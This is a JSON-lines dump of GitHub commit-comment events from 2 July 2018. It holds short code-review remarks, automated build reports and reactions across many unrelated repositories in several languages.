{"id":"7906123248","type":"CommitCommentEvent","actor":{"login":"j3mdamas"},"repo":{"name":"Acellera/htmd"},"payload":{"comment":{"id":29565091,"position":null,"line":null,"path":null,"commit_id":"cc9da27d89580dcb770298c6a1a36c99e8dc8568","created_at":"2018-07-02T11:38:01Z","updated_at":"2018-07-02T11:38:01Z","author_association":"CONTRIBUTOR","body":"just revert this commit? I think it's the best."}},"created_at":"2018-07-02T11:38:01Z"}
{"id":"7906124205","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565093,"position":33,"line":85,"path":"actionlibrary/src/test/java/com/axway/ats/action/filesystem/Test_FileSystemOperations.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T11:38:14Z","updated_at":"2018-07-02T11:38:14Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T11:38:14Z"}
{"id":"7906126063","type":"CommitCommentEvent","actor":{"login":"Riicha"},"repo":{"name":"Riicha/DataDash"},"payload":{"comment":{"id":29565095,"position":null,"line":null,"path":null,"commit_id":"4c12b3a88b8cca0b9bb35ba715f63ceb723f1cb2","created_at":"2018-07-02T11:38:42Z","updated_at":"2018-07-02T11:38:42Z","author_association":"OWNER","body":"Approved"}},"created_at":"2018-07-02T11:38:42Z"}
{"id":"7906128130","type":"CommitCommentEvent","actor":{"login":"SupratimGhosh"},"repo":{"name":"SupratimGhosh/Supratim-Ghosh"},"payload":{"comment":{"id":29565096,"position":2,"line":2,"path":"README.md","commit_id":"aa6f9f493c4991a0ede9faf7d3d86dc518a2c35d","created_at":"2018-07-02T11:39:11Z","updated_at":"2018-07-02T11:39:11Z","author_association":"OWNER","body":"This a quiet graphical snake and ladder game, created by me, using only Scanner class"}},"created_at":"2018-07-02T11:39:11Z"}
{"id":"7906130671","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29565105,"position":null,"line":null,"path":null,"commit_id":"a3b8287f005922ff4f8e4b8fc95b068a73243ffd","created_at":"2018-07-02T11:39:47Z","updated_at":"2018-07-02T11:39:47Z","author_association":"OWNER","body":"a3b8287 usuniety"}},"created_at":"2018-07-02T11:39:47Z"}
{"id":"7906130755","type":"CommitCommentEvent","actor":{"login":"martin-martin"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29565106,"position":10,"line":10,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T11:39:48Z","updated_at":"2018-07-02T11:39:48Z","author_association":"OWNER","body":"E.g. a good code comment could be:\r\n\r\n```\r\n# In the following section I was trying to solve the challenge using a for loop,\r\n# but I got stuck looking for a way to account for all possible trail names with apostrophes\r\n# Do you think this is a good start? How could I have made it work using this approach?\r\n```\r\n\r\nFor a general note on code comments - also out there in the wild! - take a look at this article: https://blog.codinghorror.com/code-tells-you-how-comments-tell-you-why/"}},"created_at":"2018-07-02T11:39:48Z"}
{"id":"7906131185","type":"CommitCommentEvent","actor":{"login":"ChinaChenYirong"},"repo":{"name":"ChinaChenYirong/-"},"payload":{"comment":{"id":29565107,"position":null,"line":null,"path":null,"commit_id":"d432d7213e41443e8189fbe6d3b6f3348312b00a","created_at":"2018-07-02T11:39:54Z","updated_at":"2018-07-02T11:39:54Z","author_association":"OWNER","body":"logo"}},"created_at":"2018-07-02T11:39:54Z"}
{"id":"7906133749","type":"CommitCommentEvent","actor":{"login":"admin36088842"},"repo":{"name":"zero9420/project"},"payload":{"comment":{"id":29565112,"position":null,"line":null,"path":null,"commit_id":"cf7e09258c9ebe03e25d2d95fd35b35f73591fd8","created_at":"2018-07-02T11:40:29Z","updated_at":"2018-07-02T11:40:29Z","author_association":"COLLABORATOR","body":"good！good！good！good！good！good！"}},"created_at":"2018-07-02T11:40:29Z"}
{"id":"7906134885","type":"CommitCommentEvent","actor":{"login":"jannekalliola"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":29565115,"position":null,"line":null,"path":null,"commit_id":"0e2e8d2e2aca2f8d0f1f2eb7b213577fcc4f623a","created_at":"2018-07-02T11:40:44Z","updated_at":"2018-07-02T11:40:44Z","author_association":"CONTRIBUTOR","body":"Do you mean that the patch broke the forecast or the original issue broke the forecast?\r\n\r\nThe date field that is parsed is coming from the weather provider - so the date from your local computer unfortunately does not help in debugging this further."}},"created_at":"2018-07-02T11:40:44Z"}
{"id":"7906134980","type":"CommitCommentEvent","actor":{"login":"martin-martin"},"repo":{"name":"martin-martin/nlpython"},"payload":{"comment":{"id":29565116,"position":1,"line":1,"path":"martin_1.py","commit_id":"6db4004e1f9f45b57fb260a7cec1ae6aaaadfe5b","created_at":"2018-07-02T11:40:46Z","updated_at":"2018-07-02T11:40:46Z","author_association":"OWNER","body":"Great that you updated the task. Having this comment upfront and at the top makes it quick and easy to know what you're aiming to achieve in the rest of the file. 👍 "}},"created_at":"2018-07-02T11:40:46Z"}
{"id":"7906135668","type":"CommitCommentEvent","actor":{"login":"SupratimGhosh"},"repo":{"name":"SupratimGhosh/Supratim-Ghosh"},"payload":{"comment":{"id":29565117,"position":2,"line":2,"path":"README.md","commit_id":"aa6f9f493c4991a0ede9faf7d3d86dc518a2c35d","created_at":"2018-07-02T11:40:55Z","updated_at":"2018-07-02T11:40:55Z","author_association":"OWNER","body":"This would help the students of 10th standard who had got the project of creating snake and ladder..."}},"created_at":"2018-07-02T11:40:55Z"}
{"id":"7906139791","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29565126,"position":null,"line":null,"path":null,"commit_id":"73531032570fd81a21e4773f3a1bfc935743e25b","created_at":"2018-07-02T11:41:53Z","updated_at":"2018-07-02T11:41:53Z","author_association":"NONE","body":"One more note, arrange all your uniform variables in UBOs (preferrably one UBO) so you do not use `extGlProgramUniform`* in any way shape or form.\r\n\r\nYou can updateSubData on the IGPUBuffer which will provide the UBO backing if the uniforms need to change. "}},"created_at":"2018-07-02T11:41:53Z"}
{"id":"7906140917","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29565127,"position":null,"line":null,"path":null,"commit_id":"6781d66a31f89151bea621e1c0c4073c8cb2792a","created_at":"2018-07-02T11:42:10Z","updated_at":"2018-07-02T11:42:10Z","author_association":"OWNER","body":"usuniety"}},"created_at":"2018-07-02T11:42:10Z"}
{"id":"7906143291","type":"CommitCommentEvent","actor":{"login":"alexandre-spieser"},"repo":{"name":"toddams/RazorLight"},"payload":{"comment":{"id":29565136,"position":69,"line":81,"path":"src/RazorLight/Compilation/RoslynCompilationService.cs","commit_id":"915ec6dc8d83865d2af074efd64dce3d53897c69","created_at":"2018-07-02T11:42:42Z","updated_at":"2018-07-02T11:42:42Z","author_association":"NONE","body":"I agree, this will prevent locking each time the getters `ParseOptions` and `CSharpCompilationOptions` are accessed."}},"created_at":"2018-07-02T11:42:42Z"}
{"id":"7906144685","type":"CommitCommentEvent","actor":{"login":"rlu789"},"repo":{"name":"Michael23B/Discord-Bot"},"payload":{"comment":{"id":29565146,"position":1,"line":1,"path":".eslintrc.json","commit_id":"4b8415c727dfb9fd10a06c2035c480c327c8641e","created_at":"2018-07-02T11:43:02Z","updated_at":"2018-07-02T11:43:02Z","author_association":"NONE","body":"haha _wow_ nice **one** @Michael23B `veryNice(;))`"}},"created_at":"2018-07-02T11:43:02Z"}
{"id":"7906144720","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/JudgeFudge911"},"payload":{"comment":{"id":29565147,"position":11,"line":21,"path":"week-07/Reddit/main.js","commit_id":"bb102b3a81665782d7c4767ec030affb6da8dab8","created_at":"2018-07-02T11:43:03Z","updated_at":"2018-07-02T11:43:03Z","author_association":"NONE","body":"if you have a table with full of posts, than it should be posts, instead of just one post"}},"created_at":"2018-07-02T11:43:03Z"}
{"id":"7906147295","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29565157,"position":13,"line":13,"path":"app/design/frontend/IdealCode/DeepFish/IdealCode_Banner/web/js/slider.js","commit_id":"f8dfc94ca18fd4d45788e55e42e96491a0c4ef60","created_at":"2018-07-02T11:43:38Z","updated_at":"2018-07-02T11:43:38Z","author_association":"OWNER","body":"Braces in same line"}},"created_at":"2018-07-02T11:43:38Z"}
{"id":"7906147308","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/JudgeFudge911"},"payload":{"comment":{"id":29565158,"position":5,"line":8,"path":"week-07/Reddit/main.js","commit_id":"b542298ffde3616fb07f7268ccc59551cd7f0125","created_at":"2018-07-02T11:43:38Z","updated_at":"2018-07-02T11:43:38Z","author_association":"NONE","body":"as we discussed we use `express.json()` now :) "}},"created_at":"2018-07-02T11:43:38Z"}
{"id":"7906150453","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29565163,"position":null,"line":null,"path":null,"commit_id":"8e6f4bde93fc4cb36881a76156caa24953efd14f","created_at":"2018-07-02T11:44:22Z","updated_at":"2018-07-02T11:44:22Z","author_association":"OWNER","body":"Automatic build report for commit 8e6f4bde93fc4cb36881a76156caa24953efd14f:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T11:44:22Z"}
{"id":"7906150698","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29565164,"position":7,"line":7,"path":"app/design/frontend/IdealCode/DeepFish/IdealCode_Banner/web/js/slider.js","commit_id":"f8dfc94ca18fd4d45788e55e42e96491a0c4ef60","created_at":"2018-07-02T11:44:25Z","updated_at":"2018-07-02T11:44:25Z","author_association":"OWNER","body":"carousel?"}},"created_at":"2018-07-02T11:44:25Z"}
{"id":"7906152929","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29565171,"position":null,"line":null,"path":null,"commit_id":"d5f058161fdb4e26a6be1c77a03b23fc639cde38","created_at":"2018-07-02T11:44:57Z","updated_at":"2018-07-02T11:44:57Z","author_association":"NONE","body":"One more note, arrange all your uniform variables in UBOs (preferrably one UBO) so you do not use `extGlProgramUniform`* in any way shape or form.\r\n\r\nYou can updateSubData on the IGPUBuffer which will provide the UBO backing if the uniforms need to change. \r\n\r\nWhen you need different values for the same UBO at different blur passes, duplicate the UBO block in the IGPUBuffer and instead of calling `updateSubData` 12 times, write all the UBO block combinations up-front, never call `updateSubData` and just bind the same IGPUBuffer as the UBO at 12 different offsets."}},"created_at":"2018-07-02T11:44:57Z"}
{"id":"7906153520","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/JudgeFudge911"},"payload":{"comment":{"id":29565174,"position":32,"line":36,"path":"week-07/Reddit/main.js","commit_id":"b542298ffde3616fb07f7268ccc59551cd7f0125","created_at":"2018-07-02T11:45:07Z","updated_at":"2018-07-02T11:45:07Z","author_association":"NONE","body":"if you just want to update 2 things, you don't have to write the user_id and the content, they should be auto-incremented or they should have a default value "}},"created_at":"2018-07-02T11:45:07Z"}
{"id":"7906154710","type":"CommitCommentEvent","actor":{"login":"phooeny"},"repo":{"name":"phooeny/CamphoraCollector"},"payload":{"comment":{"id":29565180,"position":74,"line":179,"path":"db.py","commit_id":"7896650541dc73ab7c4697e910e57e89a4c4a96d","created_at":"2018-07-02T11:45:23Z","updated_at":"2018-07-02T11:45:23Z","author_association":"OWNER","body":"this function is to change fields in json file"}},"created_at":"2018-07-02T11:45:23Z"}
{"id":"7906155696","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29565184,"position":35,"line":35,"path":"app/design/frontend/IdealCode/DeepFish/IdealCode_Banner/web/css/source/_module.less","commit_id":"f8dfc94ca18fd4d45788e55e42e96491a0c4ef60","created_at":"2018-07-02T11:45:38Z","updated_at":"2018-07-02T11:45:38Z","author_association":"OWNER","body":"Add class?"}},"created_at":"2018-07-02T11:45:38Z"}
{"id":"7906157137","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565192,"position":1,"line":25,"path":"actionlibrary/src/test/java/com/axway/ats/action/rest/Test_RestClient.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T11:45:56Z","updated_at":"2018-07-02T11:45:56Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T11:45:56Z"}
{"id":"7906157759","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29565196,"position":11,"line":11,"path":"app/design/frontend/IdealCode/DeepFish/IdealCode_Banner/templates/widget/empty.phtml","commit_id":"f8dfc94ca18fd4d45788e55e42e96491a0c4ef60","created_at":"2018-07-02T11:46:06Z","updated_at":"2018-07-02T11:46:06Z","author_association":"OWNER","body":"Check exists data"}},"created_at":"2018-07-02T11:46:06Z"}
{"id":"7906158849","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/coverxygen"},"payload":{"comment":{"id":29565205,"position":null,"line":null,"path":null,"commit_id":"4ee91980524593b1cc024aa3f1fb12897733e201","created_at":"2018-07-02T11:46:20Z","updated_at":"2018-07-02T11:46:20Z","author_association":"OWNER","body":"Automatic build report for commit 4ee91980524593b1cc024aa3f1fb12897733e201:\n\n[![Unit Tests](https://img.shields.io/badge/unittests-12%20/%2012-brightgreen.svg)](#)\n[![PyLint](https://img.shields.io/badge/pylint-failure-lightgrey.svg)](#)\n"}},"created_at":"2018-07-02T11:46:20Z"}
{"id":"7906161634","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29565209,"position":68,"line":103,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"af3d17ee53e5852d9987814fdb9e232890556951","created_at":"2018-07-02T11:46:59Z","updated_at":"2018-07-02T11:46:59Z","author_association":"OWNER","body":"Works. Look at psum shader source generation function"}},"created_at":"2018-07-02T11:46:59Z"}
{"id":"7906166718","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565217,"position":1,"line":105,"path":"agent/agentapp/containerstarter/src/main/java/com/axway/ats/agentapp/standalone/ContainerStarter.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T11:48:13Z","updated_at":"2018-07-02T11:48:13Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T11:48:13Z"}
{"id":"7906167864","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29565222,"position":9,"line":9,"path":"app/design/frontend/IdealCode/DeepFish/IdealCode_Banner/web/css/source/_module.less","commit_id":"f8dfc94ca18fd4d45788e55e42e96491a0c4ef60","created_at":"2018-07-02T11:48:27Z","updated_at":"2018-07-02T11:48:27Z","author_association":"OWNER","body":"lib-url"}},"created_at":"2018-07-02T11:48:27Z"}
{"id":"7906171229","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29565229,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-02T11:49:15Z","updated_at":"2018-07-02T11:49:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T11:49:15Z"}
{"id":"7906173688","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565236,"position":43,"line":583,"path":"agent/core/src/main/java/com/axway/ats/agent/core/ConfigurationParser.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T11:49:47Z","updated_at":"2018-07-02T11:49:47Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T11:49:47Z"}
{"id":"7906174710","type":"CommitCommentEvent","actor":{"login":"denis19973"},"repo":{"name":"oleshonchar/instabot"},"payload":{"comment":{"id":29565239,"position":15,"line":15,"path":"instagram_bot/bot.py","commit_id":"ea69aa3bfdf72d38de88f1f2418e83a8ed958903","created_at":"2018-07-02T11:50:01Z","updated_at":"2018-07-02T11:50:01Z","author_association":"NONE","body":"унеможливити self.api == False"}},"created_at":"2018-07-02T11:50:01Z"}
{"id":"7906176475","type":"CommitCommentEvent","actor":{"login":"elevinskii"},"repo":{"name":"elevinskii/magento2-theme-deepfish"},"payload":{"comment":{"id":29565242,"position":69,"line":69,"path":"app/design/frontend/IdealCode/DeepFish/IdealCode_Banner/web/css/source/_module.less","commit_id":"f8dfc94ca18fd4d45788e55e42e96491a0c4ef60","created_at":"2018-07-02T11:50:26Z","updated_at":"2018-07-02T11:50:26Z","author_association":"OWNER","body":".button?"}},"created_at":"2018-07-02T11:50:26Z"}
{"id":"7906178029","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565246,"position":4,"line":54,"path":"agent/core/src/main/java/com/axway/ats/agent/core/MultiThreadedActionHandler.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T11:50:47Z","updated_at":"2018-07-02T11:50:47Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T11:50:47Z"}
{"id":"7906178239","type":"CommitCommentEvent","actor":{"login":"rasple"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29565249,"position":null,"line":null,"path":null,"commit_id":"508f0bf82f5d0b0dc316d51019d3a5d1e8abaecb","created_at":"2018-07-02T11:50:49Z","updated_at":"2018-07-02T11:50:49Z","author_association":"OWNER","body":"Alter was für einen Müll hat der H* da schon wieder produziert? \r\n\r\nPS: Bitte nimm zur Kenntnis, dass dieser Kommentar nicht gegen den Code of Conduct verstößt."}},"created_at":"2018-07-02T11:50:49Z"}
{"id":"7906180192","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565254,"position":4,"line":75,"path":"agent/core/src/main/java/com/axway/ats/agent/core/action/TemplateActionMethod.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T11:51:16Z","updated_at":"2018-07-02T11:51:16Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T11:51:16Z"}
{"id":"7906182062","type":"CommitCommentEvent","actor":{"login":"nvyo"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29565261,"position":61,"line":406,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T11:51:41Z","updated_at":"2018-07-02T11:51:41Z","author_association":"COLLABORATOR","body":"То же касается всяких Please try again и Please select в промптах интерфейса. Это не значит, что нам нужно тоже любезничать. Просто, во-первых, в английском традиция немного другая, во-вторых, в случае с select слово Please даёт понять, что это именно обращение к пользователю и побуждение к действию, а не просто какое-то отдельно стоящее слово"}},"created_at":"2018-07-02T11:51:41Z"}
{"id":"7906183046","type":"CommitCommentEvent","actor":{"login":"xcom169"},"repo":{"name":"rwengine/openrw"},"payload":{"comment":{"id":29565265,"position":null,"line":null,"path":null,"commit_id":"93c55057c89f53ef340f07c3fd5ca3fe0ac6ea82","created_at":"2018-07-02T11:51:56Z","updated_at":"2018-07-02T11:51:56Z","author_association":"NONE","body":"Hello!\r\n\r\nWhere is the variable for the ' 32-bit RGBA buffer  image' ? "}},"created_at":"2018-07-02T11:51:56Z"}
{"id":"7906184408","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565270,"position":36,"line":172,"path":"agent/core/src/main/java/com/axway/ats/agent/core/ant/ActionClassGenerator.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T11:52:13Z","updated_at":"2018-07-02T11:52:13Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T11:52:13Z"}
{"id":"7906186240","type":"CommitCommentEvent","actor":{"login":"Lucidem"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29565275,"position":null,"line":null,"path":null,"commit_id":"5f9592e4ff7e7c1eb01831b257c011c767f337c7","created_at":"2018-07-02T11:52:38Z","updated_at":"2018-07-02T11:52:38Z","author_association":"NONE","body":"👌"}},"created_at":"2018-07-02T11:52:38Z"}
{"id":"7906188654","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565279,"position":1,"line":51,"path":"agent/core/src/main/java/com/axway/ats/agent/core/configuration/ConfigurationManager.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T11:53:11Z","updated_at":"2018-07-02T11:53:11Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T11:53:11Z"}
{"id":"7906191746","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29565296,"position":4,"line":100,"path":"agent/core/src/main/java/com/axway/ats/agent/core/configuration/EnvironmentConfigurator.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T11:53:55Z","updated_at":"2018-07-02T11:53:55Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T11:53:55Z"}
{"id":"7906193843","type":"CommitCommentEvent","actor":{"login":"roberthoenig"},"repo":{"name":"zulip/zulip-mobile"},"payload":{"comment":{"id":29565302,"position":10,"line":26,"path":"android/settings.gradle","commit_id":"7ce4d0c2f48596caf1ce2f9a8169680a7069416f","created_at":"2018-07-02T11:54:22Z","updated_at":"2018-07-02T11:54:22Z","author_association":"CONTRIBUTOR","body":"Is there a reason why this line got moved to the end?"}},"created_at":"2018-07-02T11:54:22Z"}
{"id":"7906194112","type":"CommitCommentEvent","actor":{"login":"frederic-mahe"},"repo":{"name":"frederic-mahe/vsearch-tests"},"payload":{"comment":{"id":29565303,"position":null,"line":null,"path":null,"commit_id":"04545f6ff20475694c9fd0e6e734e16d823111a9","created_at":"2018-07-02T11:54:26Z","updated_at":"2018-07-02T11:54:26Z","author_association":"OWNER","body":"OK, noted."}},"created_at":"2018-07-02T11:54:26Z"}
{"id":"7906197694","type":"CommitCommentEvent","actor":{"login":"stephenchy"},"repo":{"name":"stephenchy/win"},"payload":{"comment":{"id":29565314,"position":null,"line":null,"path":null,"commit_id":"b7467f9d815d68349156ae9f7a47d10ea562506b","created_at":"2018-07-02T11:55:14Z","updated_at":"2018-07-02T11:55:14Z","author_association":"OWNER","body":"真棒"}},"created_at":"2018-07-02T11:55:14Z"}
{"id":"7906198037","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-tomita/meikai_java_2018_04"},"payload":{"comment":{"id":29565315,"position":64,"line":64,"path":"E03/E4/src/e4_15/E4_15.java","commit_id":"c1677fb62efbde7a03578ab910e20129773062c3","created_at":"2018-07-02T11:55:19Z","updated_at":"2018-07-02T11:55:19Z","author_association":"COLLABORATOR","body":"柴田\r\nマジックナンバーが出てます。難しいですが何とか考えて解消してください。"}},"created_at":"2018-07-02T11:55:19Z"}
{"id":"7906200678","type":"CommitCommentEvent","actor":{"login":"deiwin"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":29565322,"position":13,"line":257,"path":"lib/ansible/modules/cloud/amazon/ec2_vpc_subnet.py","commit_id":"7f8654d586be176a355a685c249eb28fd5a17d0d","created_at":"2018-07-02T11:55:53Z","updated_at":"2018-07-02T11:55:53Z","author_association":"CONTRIBUTOR","body":"Doesn't the `not` here reverse the previous condition?"}},"created_at":"2018-07-02T11:55:53Z"}
{"id":"7906201502","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29565323,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-02T11:56:05Z","updated_at":"2018-07-02T11:56:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T11:56:05Z"}
{"id":"7906203287","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29565326,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-02T11:56:28Z","updated_at":"2018-07-02T11:56:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T11:56:28Z"}
{"id":"7906209305","type":"CommitCommentEvent","actor":{"login":"Sejiro-Hiko"},"repo":{"name":"ahmedkaludi/accelerated-mobile-pages"},"payload":{"comment":{"id":29565334,"position":null,"line":null,"path":null,"commit_id":"1533e1b7f3dbcefb39fe0beab3498aeb2cdc3fa2","created_at":"2018-07-02T11:57:47Z","updated_at":"2018-07-02T11:57:47Z","author_association":"COLLABORATOR","body":"okay\r\n"}},"created_at":"2018-07-02T11:57:47Z"}
{"id":"7906212334","type":"CommitCommentEvent","actor":{"login":"Aishuav01"},"repo":{"name":"Aishuav01/bonjourmadamme.github.io"},"payload":{"comment":{"id":29565342,"position":null,"line":null,"path":null,"commit_id":"a68b1ddd87adc9d77ff71b0b5904b8077952af47","created_at":"2018-07-02T11:58:30Z","updated_at":"2018-07-02T11:58:30Z","author_association":"OWNER","body":"uploading a website"}},"created_at":"2018-07-02T11:58:30Z"}
{"id":"7906212879","type":"CommitCommentEvent","actor":{"login":"sueloverso"},"repo":{"name":"wiredtiger/wiredtiger"},"payload":{"comment":{"id":29565345,"position":9,"line":358,"path":"src/txn/txn_timestamp.c","commit_id":"0929ebb734256f6ce65817d05c269ce52adf7dcc","created_at":"2018-07-02T11:58:38Z","updated_at":"2018-07-02T11:58:38Z","author_association":"MEMBER","body":"While you're in the neighborhood I noticed on the code snippet that this line, unchanged in this ticket, should have the curly braces removed."}},"created_at":"2018-07-02T11:58:38Z"}
{"id":"7906216568","type":"CommitCommentEvent","actor":{"login":"lenormf"},"repo":{"name":"mawww/kakoune"},"payload":{"comment":{"id":29565351,"position":20,"line":100,"path":"rc/extra/git-tools.kak","commit_id":"379e7c2d2d0968ad654e8e60b7164e175d66624c","created_at":"2018-07-02T11:59:26Z","updated_at":"2018-07-02T11:59:26Z","author_association":"CONTRIBUTOR","body":"Actually it's better to let the tool print errors (no `2>/dev/null`), it helps users who don't use commands correctly figure out what's wrong by reading the debug buffer."}},"created_at":"2018-07-02T11:59:26Z"}
